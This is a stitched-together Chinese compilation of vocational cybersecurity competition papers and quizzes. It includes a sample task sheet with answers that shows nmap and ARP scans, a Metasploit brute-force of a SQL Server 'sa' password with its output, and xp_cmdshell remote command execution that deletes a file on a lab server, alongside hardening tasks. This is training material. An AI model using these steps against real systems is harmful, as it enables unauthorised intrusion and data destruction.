2020 中职 技能大赛改革试点赛 网络安全试题(三)
中职网络安全 保护信息密码安全 测试题(含答案)
中职网络安全技术测试题(分章节)(第三章保护信息密码安全)(含答案)本套试题主要用于中职教材网络安全基础知识测评,用于网络安全技术课程。
测试内容包括:office文档密码设置、压缩文件、压缩文件密码设置、共享文件夹设置、FAT文件系统、EFS加密等方面的知识。
一、选择题(每个小题2分,共40分)1、为什么要对文件进行压缩,以下说法不正确的是()A.为了提高文件传输效率B.为了减少文件的大小C.为了压缩时设置密码,增强其保密性D.减少文件名的长度,以便存储。
2、哪类文件不是常见的压缩文件格式()。
A..rarB..zipC..exeD..bmp3、以下对压缩文件格式的说法,不正确的是()A.winrar压缩文件属于无损压缩B.winrar通常情况下,压缩比比winzip要低C.winrar的压缩文件有时,压缩后的文件比压缩前要大D.以上都不对4、用winrar压缩软件对压缩文件进行分卷压缩时,分割文件在解压文件时()A.需要放在不同的文件夹下B.需要放在同一文件夹下C.需要放在winrar安装目录下D.以上都可以5、office 文档中,“限制权限”功能能限制的权限,不包括()A.浏览B.复制C.编辑D.打印6、office办公软件中,提供设置文档访问权限功能,不包括以下哪项内容()A.标记为最终状态B.加密C.限制编辑D.打印设置7、对office 文档设置修改时的密码时,在哪个按钮下()A.“工具”\“常规设置”B.“工具”\“常规选项”C.“准备”\“加密文档”D.“准备”\“常规选项”8、早期文件系统遵循8.3命名规则,这项规则的意思是()A.文件名最多8个字符,扩展名3个字符。
B.文件名共8个字符,其中扩展名占3个字符。
C.文件系统是8月3日制定的,所以叫8.3规则。
D.文件名采用8位二进制保存,扩展名采用3位二进制保存。
9、下列哪项不是文件系统的文件格式()A.FAT16B.NTFSC.FAT32D.FAT10、关于对EFS加密原理描述正确的是()A.EFS加密基于公钥策略,先利用私钥加密,后用公钥解密。
2020年全国职业院校技能大赛:网络系统管理项目(模块C)样卷1
2020年全国职业院校技能大赛改革试点赛“网络系统管理”赛项“网络构建”模块(样卷1)全国职业院校技能大赛执委会.技术专家组2020年9月目录一.说明 (3)二.项目背景 (3)三.项目规划和设计 (4)四.网络项目实施 (13)(一)设备基础信息配置与验证 (13)(二)网络搭建与网络冗余备份方案部署 (14)(三)移动互联网搭建与无线网络优化 (19)(四)实施出口安全防护与远程接入 (21)五.无线网络规划与实施 (22)(一)无线网络业务背景及需求介绍 (22)(二)无线网络中的业务规划 (25)六.提交竞赛结果文件说明 (28)一.说明本模块比赛时间为4小时。
请合理分配竞赛时间。
请仔细阅读以下要求。
1. 比赛时间结束时,请将工作站保持运行状态,评分过程需要在运行状态进行,不允许重启。
由于重启造成配置丢失由考生个人负责。
2. 为了方便测试,全网允许ICMP流量通行,请将操作系统的防火墙配置为允许Ping状态。
3.默认密码:XXXXXX。
4.软件&工具:见“2020年全国职业院校技能大赛改革试点赛赛项规程”。
二.项目背景陕西招财银行是一家地方性商业银行,创建于1985年,其省行(一级行)位于陕西省西安市,在全省各地市均建有二级行,各区县建立的支行及网点已超过150个。
随着省行的网络扁平化改造,所有的二级行、支行及网点均需要直接连接到省行,其网络运行及维护的效率也得到了极大的提升。
为了保证网络的稳定且方便维护,省行网络分为核心区、业务区、互联区、外联区四个部分。
其中:核心区作为全网的中心枢纽承担了各类业务数据流量的转发工作。
业务区分别通过有线和无线网络,为生产数据流(存/取款等相关数据)和办公数据流(OA、视频会议等与钱无关的数据)提供了服务。
互联区通过MSTP专线连接总行、全省所有的二级行、支行及网点。
外联区通过互联网向用户提供如网上银行等线上服务,并对接第三方公司并提供相关服务;同时,省行的办公人员也能通过外联区访问Internet。
2022 年全国职业院校技能大赛(中职组)网络安全赛项赛题网络安全竞赛试题5
2022年全国职业院校技能大赛(中职组)网络安全竞赛试题(5)(总分100分)赛题说明一、竞赛项目简介“网络安全”竞赛共分A.基础设施设置与安全加固;B.网络安全事件响应、数字取证调查和应用安全;C.CTF夺旗-攻击;D.CTF夺旗-防御等四个模块。
根据比赛实际情况,竞赛赛场实际使用赛题参数、表述及环境可能有适当修改,具体情况以实际比赛发放赛题为准。
竞赛时间安排和分值权重见表1。
表1 竞赛时间安排与分值权重二、竞赛注意事项1.比赛期间禁止携带和使用移动存储设备、计算器、通信工具及参考资料。
2.请根据大赛所提供的比赛环境,检查所列的硬件设备、软件清单、材料清单是否齐全,计算机设备是否能正常使用。
3.在进行任何操作之前,请阅读每个部分的所有任务。
各任务之间可能存在一定关联。
4.操作过程中需要及时按照答题要求保存相关结果。
比赛结束后,所有设备保持运行状态,评判以最后提交的成果为最终依据。
5.比赛完成后,比赛设备、软件和赛题请保留在座位上,禁止将比赛所用的所有物品(包括试卷等)带离赛场。
6.禁止在提交资料上填写与竞赛无关的标记,如违反规定,可视为0分。
竞赛内容模块A 基础设施设置与安全加固(本模块20分)一、项目和任务描述:假定你是某企业的网络安全工程师,对于企业的服务器系统,根据任务要求确保各服务正常运行,并通过综合运用用户安全管理和密码策略、本地安全策略、日志安全审计、数据库安全策略、Web安全加固、防火墙策略等多种安全策略来提升服务器系统的网络安全防御能力。
本模块要求根据竞赛现场提供的A模块答题模板对具体任务的操作进行截图并加以相应的文字说明,以word文档的形式书写,以PDF格式保存,以“赛位号+模块A”作为文件名,PDF格式文档为此模块评分唯一依据。
二、服务器环境说明Windows 用户名:administrator,密码:123456Linux 用户名:root,密码:123456三、具体任务(每个任务得分以电子答题卡为准)A-1任务一登录安全加固(Windows)1.密码策略a.密码策略必须同时满足大小写字母、数字、特殊字符;b.强制密码历史为5个密码;c.密码最长存留期为45天;d.最小密码长度不少于8个字符。
江苏省2020年度中职组网络空间安全赛项样题及答案(供参考)
2018年度全国职业技能大赛中职组“网络空间安全”赛项江苏省竞赛任务书(样题)一、竞赛时间9:00-12:00,共计3小时。
二、竞赛阶段简介三、竞赛任务书内容(一)拓扑图(二)第一阶段任务书任务1.ARP扫描渗透测试任务环境说明:✓服务器场景:CentOS5.5✓服务器场景操作系统:CentOS5.51.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作使用命令中固定不变的字符串作为Flag提交;Arping –c 52.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作结果的最后1行,从左边数第2个数字作为Flag提交;Arping –c 5root@kali:~# arping -c 5ARPING from eth0Unicast reply from [00:0C:29:62:80:73] 1.017msUnicast reply from [00:0C:29:62:80:73] 0.638msUnicast reply from [00:0C:29:62:80:73] 1.051msUnicast reply from [00:0C:29:62:80:73] 1.590msUnicast reply from [00:0C:29:62:80:73] 1.051msSent 5 probes (1 broadcast(s))Received 5 response(s)Flag:53.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),并将工具Metasploit 中arp_sweep模块存放路径字符串作为Flag(形式:字符串1/字符串2/字符串3/…/字符串n)提交;msf > use auxiliary/scanner/discovery/arp_sweepFlag:Auxiliary/scanner/discovery/arp_sweep4.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的最后1行的最后1个单词作为Flag提交;msf > use auxiliary/scanner/discovery/arp_sweepmsf auxiliary(arp_sweep) > run[*] appears to be up (VMware, Inc.).[*] appears to be up (VMware, Inc.).[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completedFlag:completed5.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的第1行出现的IP地址右边的第1个单词作为Flag提交;msf auxiliary(arp_sweep) > run[*] appears to be up (VMware, Inc.).[*] appears to be up (VMware, Inc.).[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completedFlag:appears6.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块的运行命令字符串作为Flag提交;Flag:exploit or run任务2.操作系统及应用程序扫描渗透测试任务环境说明:✓服务器场景:CentOS5.5✓服务器场景操作系统:CentOS5.51.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ping扫描渗透测试(使用工具nmap,使用参数n,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;Flag:Nmap –n –Sp2.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ping扫描渗透测试(使用工具nmap),并将该操作显示结果的上数第3行左数第3个单词作为Flag提交;root@kali:~# nmap -n -sPStarting Nmap 7.40 ( ) at 2017-12-10 19:59 ESTNmap scan report forHost is up (0.00069s latency).Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds Flag:up3.通过PC2中渗透测试平台对服务器场景CentOS5.5进行综合性扫描渗透测试(使用工具nmap,使用参数n,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;root@kali:~# nmap -n -AStarting Nmap 7.40 ( ) at 2017-12-10 20:11 ESTNmap scan report forHost is up (0.00025s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 4.3 (protocol 2.0)| ssh-hostkey:| 1024 95:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08 (DSA) |_ 2048 90:3f:56:9b:cd:c7:5b:aa:1c:40:57:4d:45:c4:c1:cd (RSA) 111/tcp open rpcbind 2 (RPC #100000)| rpcinfo:| program version port/proto service| 100000 2 111/tcp rpcbind| 100000 2 111/udp rpcbind| 100024 1 910/udp status|_ 100024 1 913/tcp statusMAC Address: 00:0C:29:62:80:73 (VMware)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6OS details: Linux 2.6.9 -Network Distance: 1 hopTRACEROUTEHOP RTT ADDRESS1 0.25 msOS and Service detection performed. Please report any incorrect results at / .Nmap done: 1 IP address (1 host up) scanned in 8.22 secondsFlag:Nmap –n –A4.通过PC2中渗透测试平台对服务器场景CentOS5.5进行综合性扫描渗透测试(使用工具nmap,使用参数n,使用必须要使用的参数),并将该操作显示结果的最后1行最后1个单词作为Flag提交;root@kali:~# nmap -n -AStarting Nmap 7.40 ( ) at 2017-12-10 20:11 ESTNmap scan report forHost is up (0.00025s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 4.3 (protocol 2.0)| ssh-hostkey:| 1024 95:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08 (DSA) |_ 2048 90:3f:56:9b:cd:c7:5b:aa:1c:40:57:4d:45:c4:c1:cd (RSA) 111/tcp open rpcbind 2 (RPC #100000)| rpcinfo:| program version port/proto service| 100000 2 111/tcp rpcbind| 100000 2 111/udp rpcbind| 100024 1 910/udp status|_ 100024 1 913/tcp statusMAC Address: 00:0C:29:62:80:73 (VMware)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6OS details: Linux 2.6.9 -Network Distance: 1 hopTRACEROUTEHOP RTT ADDRESS1 0.25 msOS and Service detection performed. Please report any incorrect results at / .Nmap done: 1 IP address (1 host up) scanned in 8.22 secondsFlag:seconds5.通过PC2中渗透测试平台对服务器场景CentOS5.5进行操作系统扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;root@kali:~# nmap -OStarting Nmap 7.40 ( ) at 2017-12-10 20:13 ESTNmap scan report forHost is up (0.00044s latency).Not shown: 998 closed portsPORT STATE SERVICE22/tcp open ssh111/tcp open rpcbindMAC Address: 00:0C:29:62:80:73 (VMware)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6OS details: Linux 2.6.9 -Network Distance: 1 hopOS detection performed. Please report any incorrect results at / .Nmap done: 1 IP address (1 host up) scanned in 14.80 seconds Flag:Nmap –O6.通过通过PC2中渗透测试平台对服务器场景CentOS5.5进行系统服务及版本号扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;Flag:Nmap –sV7.通过通过PC2中渗透测试平台对服务器场景CentOS5.5进行系统服务及版本号扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作显示结果的SSH服务版本信息字符串作为Flag提交;root@kali:~# nmap -sVStarting Nmap 7.40 ( ) at 2017-12-10 20:17 ESTNmap scan report forHost is up (0.00014s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 4.3 (protocol 2.0)111/tcp open rpcbind 2 (RPC #100000)MAC Address: 00:0C:29:62:80:73 (VMware)Service detection performed. Please report any incorrect results at / .Nmap done: 1 IP address (1 host up) scanned in 19.60 seconds Flag:OpenSSH 4.3任务3.Web应用程序文件包含安全攻防任务环境说明:✓服务器场景名称:WebServ2003✓服务器场景安全操作系统:Microsoft Windows2003 Server✓服务器场景安装中间件:Apache2.2;✓服务器场景安装Web开发环境:Php6;✓服务器场景安装数据库:Microsoft SqlServer2000;✓服务器场景安装文本编辑器:EditPlus;1.访问WebServ2003服务器场景,"/"->"Display Uploaded's FileContent",分析该页面源程序,找到提交的变量名,并将该变量名作为Flag(形式:name=“变量名”)提交;2.对该任务题目1页面注入点进行渗透测试,通过,并将注入语句作为Flag提交;3.对该任务题目2页面注入点进行注入以后,将当前页面以Base64编码方式回显内容作为Flag提交;4.通过PHP函数对题目3中Base64编码回显内容进行解码,并将解码内容作为Flag提交;5.进入WebServ2003服务器场景的目录,找到DisplayFileCtrl.php文件,使用EditPlus工具打开并填写该文件中空缺的F1、F2、F3、F4的值,使之可以抵御文件包含渗透测试,并提交Flag(形式:F1|F2|F3|F4);6.再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对WebServ2003服务器场景进行文件包含渗透测试无效,并将回显页面源文件内容作为Flag提交;任务4.数据库安全加固任务环境说明:✓服务器场景名称:WebServ2003✓服务器场景安全操作系统:Microsoft Windows2003 Server✓服务器场景安装中间件:Apache2.2;✓服务器场景安装Web开发环境:Php6;✓服务器场景安装数据库:Microsoft SqlServer2000;✓服务器场景安装文本编辑器:EditPlus;1.对服务器场景WebServ2003安装补丁,使其中的数据库MicrosoftSqlServer2000能够支持远程连接,并将补丁包程序所在目录名称作为Flag提交;2.对服务器场景WebServ2003安装补丁,使其中的数据库MicrosoftSqlServer2000能够支持远程连接,在安装补丁后的服务器场景中运行netstat–an命令,将回显的数据库服务连接状态作为Flag提交;C:\Documents and Settings\Administrator>netstat -anActive ConnectionsProto Local Address Foreign Address State TCP LISTENINGTCP LISTENINGTCP LISTENINGTCP LISTENINGTCP LISTENINGUDP *:*UDP *:*UDP *:*UDP *:*UDP *:*UDP *:*UDP *:*UDP *:*Flag:LISTENING3.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务扫描渗透测试,并将扫描结果作为Flag提交;msf > use auxiliary/scanner/mssql/mssql_pingmsf auxiliary(mssql_ping) > run[*] - SQL Server information for[+] - ServerName = SERVER[+] - InstanceName = MSSQLSERVER[+] - IsClustered = No[+] - Version =[+] - tcp = 1433[+] - np = \\SERVER\pipe\sql\query[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed4.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务超级管理员口令暴力破解(使用PC2中的渗透测试平台中的字典文件superdic.txt),并将破解结果中的最后一个字符串作为Flag提交;msf > use auxiliary/scanner/mssql/mssql_loginmsf auxiliary(mssql_login) > set username samsf auxiliary(mssql_login) > set pass_file/usr/share/wordlists/metasploit/password.lstmsf auxiliary(mssql_login) > run[*] - - MSSQL - Starting authentication scanner.[!] - No active DB -- Credential data will not be saved![-] - - LOGIN FAILED: WORKSTATION\sa:!@#$% (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:!@#$%^ (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:!@#$%^& (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!@#$%^&* (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!boerbul (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!boerseun (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!gatvol (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!hotnot (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:!kak (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!koedoe (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!likable (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!poes (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!pomp (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!soutpiel (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:.net (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:0 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:000000 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:00000000 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:0007 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:007 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:007007 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:0s (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:0th (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:10 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:100 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1000 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1000s (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:100s (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1022 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:10s (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:10sne1 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1111 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:11111 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:111111 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa: (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:112233 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1212 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:121212 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1213 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1214 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1225 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:123 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:123123 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:123321 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1234 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:12345 (Incorrect: ) [+] - - LOGIN SUCCESSFUL: WORKSTATION\sa:123456[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completedFlag: completed5.通过PC2中de1渗透测试平台对服务器场景WebServ2003进行数据库服务扩展存储过程进行利用,删除WebServ2003服务器场景C:\1.txt,并将渗透测试利用命令以及渗透测试平台run结果第1行回显作为Flag 提交;msf auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_exec msf auxiliary(mssql_exec) > set rhostmsf auxiliary(mssql_exec) > set password 123456msf auxiliary(mssql_exec) > set cmd cmd.exe /c del "C:\\1.txt" msf auxiliary(mssql_exec) > run[*] - SQL Query: EXEC master..xp_cmdshell 'cmd.exe /c del C:\1.txt' output------[*] Auxiliary module execution completedFlag: [*] - SQL Query: EXEC master..xp_cmdshell 'cmd.exe /c del C:\1.txt'6.通过对服务器场景WebServ2003的数据库服务进行安全加固,阻止PC2中渗透测试平台对其进行数据库超级管理员密码暴力破解渗透测试,并将加固身份验证选项中的最后一个字符串作为Flag提交:W7.验证在WebServ2003的数据库服务进行安全加固后,再次通过PC2中渗透测试平台对服务器场景WebServ2003进行数据库服务超级管理员口令进行暴力破解(使用PC2中的渗透测试平台中的字典文件superdic.txt),并将破解结果的从上向下数第3行内容作为Flag提交;msf auxiliary(mssql_login) > run[*] - - MSSQL - Starting authentication scanner.[!] - No active DB -- Credential data will not be saved![-] - - LOGIN FAILED: WORKSTATION\sa:!@#$% (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!@#$%^ (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!@#$%^& (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!@#$%^&* (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!boerbul (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!boerseun (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!gatvol (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!hotnot (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!kak (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:!koedoe (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!likable (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!poes (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!pomp (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!soutpiel (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:.net (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:0 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:000000 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:00000000 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:0007 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:007 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:007007 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:0s (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:0th (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:1 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:10 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:100 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:1000 (Incorrect: )[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed(三)第二阶段任务书假定各位选手是某企业信息安全工程师,负责服务器的维护,其中某服务器可能存在着各种问题和漏洞(见以下漏洞列表)。
中职网络安全 防范网络病毒 测试题(含答案)
中职网络安全技术测试题(分章节)(第二章防范网络病毒)(含答案)本套试题主要用于中职教材网络安全基础知识测评,用于网络安全技术课程。
测试内容包括:网络病毒特征、病毒分类、病毒危害、病毒种类、杀毒软件特征、杀毒软件分类等方面的知识。
一、选择题(每个小题2分,共40分)1、下列选项中不属于计算机病毒特征的是()A.隐藏性B.传染性C.寄生性D.侵入性2、()特性是计算机网络病毒的最重要的特征,是判断一段程序是否病毒的依据。
A.寄生性B.传染性C.破坏性D.隐藏性3、计算机病毒通过自我复制,从一个程序体进入另一个程序体或从一台计算机进入另一台计算机的过程,体现了病毒的哪类特征()A.寄生性B.传染性C.寄生性D.侵害性4、计算机引导型病毒感染计算机系统的哪个部分()A.引导扇区B.硬盘数据区C.FATD.文件头5、以下哪个特点为无害型病毒的特点()A.减少磁盘可用空间B减少内存 C.显示图像 D.发出声音6、根据病毒的算法,对伴随型病毒说法正确的是()A.此类病毒会改变文件本身,根据算法产生exe文件的伴随体。
B.此类病毒文件具有同样的名字和不同的扩展名(.com)。
C.当感染了此类病毒的文件被系统加载时,.exe的文件被优先执行。
D.病毒感染后,.exe文件和.com文件被同时执行。
7、对蠕虫病毒的说法错误的是()A.通过网络传播,不改变文件文件和信息B.利用网络从一台计算机传播到另外一台计算机C.蠕虫病毒感染计算机后,会减少磁盘的可用空间D.感染了病毒的计算机,其系统内存会被消耗,甚至导致计算机瘫痪。
8、幽灵病毒是一种比较成熟的病毒,以下说法正确的是()A.幽灵病毒算法简单,传播速度快,病毒代码较为成熟。
B.此类病毒每次传播,自身的都具有相同的内容和长度。
C.幽灵病毒一般由一段混有无关指令的解码算法和变异的病毒体组成。
D.幽灵病毒通过计算机网络进行传播9、计算机病毒依靠寄生能力,在侵入到系统后,可能很长一段时间都不会发作,病毒的这种特性称为()A.潜伏性B.寄生性C.隐藏性D.传染性10、一段计算机病毒代码保存在计算机系统中,已完成引导进入内存,但还有实施运行,此类病毒的状态处于()A.动态B.静态C.从静态转动态的过程D.从动态转静态过程11、宏病毒是一种常见病毒,它的传播依靠()A.网络文件B.windows和office系统C.电子邮件D.vb编程软件12、CIH病毒是第一个破坏计算机硬件的病毒,它主要破坏了()A.损坏文件的文件头B.操作系统引导扇区C.主板BIOS中的数据甚至硬盘分区表D.毁坏硬盘数据,导致黑屏13、世界上公认的第一个个人计算机病毒是()A.C-brain病毒B.莫里斯病毒C.梅莉莎病毒D.Nimda病毒14、这个病毒是一个内存驻留型病毒,它感染可执行文件,在进入内存后,快速复制,导致计算机速度降低很快甚至瘫痪,并在屏幕下方显示一个窗口,这个病毒是()A.冲击波病毒B.黑色星期五病毒C.莫里斯病毒D.Nimda病毒15、关于杀毒软件,哪些说法是错误的()A.杀毒软件不可能查出所有病毒B.杀毒软件能够查出所有病毒,但不一定能清除C.杀毒软件不建议安装过多的杀毒软件D.杀毒软件对感染的文件有多种处理方式16、关于杀毒软件,以下说法不正确的是()A.360杀毒软件--白名单优先技术B.金山毒霸--可信用查杀C.瑞星杀毒--第八代杀毒引擎D.瑞星杀毒--木马拦截17、以下不是蠕虫病毒的是()A.莫里斯B.NimdaC.熊猫烧香D.CIH18、关于宏病毒说法错误的是()A.建议不要多人共用一个office程序B.宏病毒可能作为邮件的附件进行传播C.一般的杀毒软件都可清除宏病毒D.宏病毒在发作时,会大量的占用内存19、杀毒软件的功能不包括()A.查杀病毒B.数据恢复C.防病毒入侵D.文件存储20、按病毒存在的媒体分,以下不正确的是()A.网络病毒B.文件病毒C. 引导型病毒D.变型病毒二、简答题(每个题6分,共30分)1、请写出病毒的特征有哪些?2、请详细写出网络病毒的危害有哪些?3、请写出杀毒软件的特征有哪些?4、请写出对于宏病毒的防范措施有哪些?5、请写出常用的杀毒软件有哪些?三、论述题(每题15分,共30分)1、随着互联网的发展,网络病毒种类越来越多,请结合目前的病毒情况,从多个角度,写出病毒的分类。
2020年全国职业院校技能大赛:网络系统管理项目-B模块样题3
2020年全国职业院校技能大赛改革试点赛网络系统管理赛项(样题3)模块B:Windows环境全国职业院校技能大赛执委会.技术专家组2020年09月目录一、赛题说明 .............................................................................. 错误!未定义书签。
(一)竞赛介绍 ....................................................................... 错误!未定义书签。
(二)密码 ............................................................................... 错误!未定义书签。
(三)竞赛时间 ....................................................................... 错误!未定义书签。
(四)竞赛注意事项 ............................................................... 错误!未定义书签。
(五)竞赛结果文件的提交.................................................... 错误!未定义书签。
二、项目任务描述 (3)(一)基本配置 (4)(二)拓扑图 (5)三、项目任务清单 (5)(一)DCserver配置任务 (5)(二)SDCserver配置任务 (8)(三)Server01配置任务 (9)(四)Server02配置任务 (10)(五)Server03配置任务 (11)(六)GWserver配置任务 (12)(七)Client配置任务 (13)一、赛题说明(一)竞赛介绍请详细阅读网络拓扑图,为所有计算机修改默认防火墙以便允许ICMP和相应的流量,不允许直接关闭主机的防火墙。
网络安全考试试题-答案(三级等级保护测评)
答案1、(单选题)根据《网络安全法》的规定,关键信息基础设施的运营者在中华人民共和国境内运营中收集和产生的个人信息和重要数据应当在()。
因业务需要,确需向境外提供的,应当按照国家网信部门会同国务院有关部门制定的办法进行安全评估,法律、行政法规另有规定的,依照其规定。
A.境外存储B.外部存储器储存C.第三方存储D.境内存储正确答案:D2、(单选题)国家鼓励开发网络数据安全保护和利用技术,促进()开放,推动技术创新和经济社会发展。
A.公共图书馆资源B.国家数据资源C.公共学校资源D.公共数据资源正确答案:D3、(单选题)国家倡导诚实守信、健康文明的网络行为,推动传播社会主义核心价值观,采取措施提高全社会的()和水平,形成全社会共同参与促进网络安全的良好环境。
A.网络安全意识B.网络诚信意识C.网络社会道德意识D.网络健康意识正确答案:A4、(单选题)根据《网络安全法》的规定,国家实行网络安全()保护制度。
A.等级B.分层C.结构D.行政级别正确答案:A5、(单选题)《网络安全法》规定,各级人民政府及其有关部门应当组织开展经常性的网络安全宣传教育,并()有关单位做好网络安全宣传教育工作。
A.指导、督促B.支持、指导C.鼓励、引导D.支持、引导正确答案:A6、(单选题)国家建立和完善网络安全标准体系。
()和国务院其他有关部门根据各自的职责,组织制定并适时修订有关网络安全管理以及网络产品、服务和运行安全的国家标准、行业标准。
A.电信研究机构B.国务院标准化行政主管部门C.网信部门D.电信企业正确答案:B7、(单选题)网络产品、服务的提供者不得设置(),发现其网络产品、服务存在安全缺陷、漏洞等风险时,应当立即采取补救措施,按照规定及时告知用户并向有关主管部门报告。
A.恶意程序B.风险程序C.病毒程序D.攻击程序正确答案:A8、(单选题)国家推进网络安全()建设,鼓励有关企业、机构开展网络安全认证、检测和风险评估等安全服务。
网络安全技能大赛试题
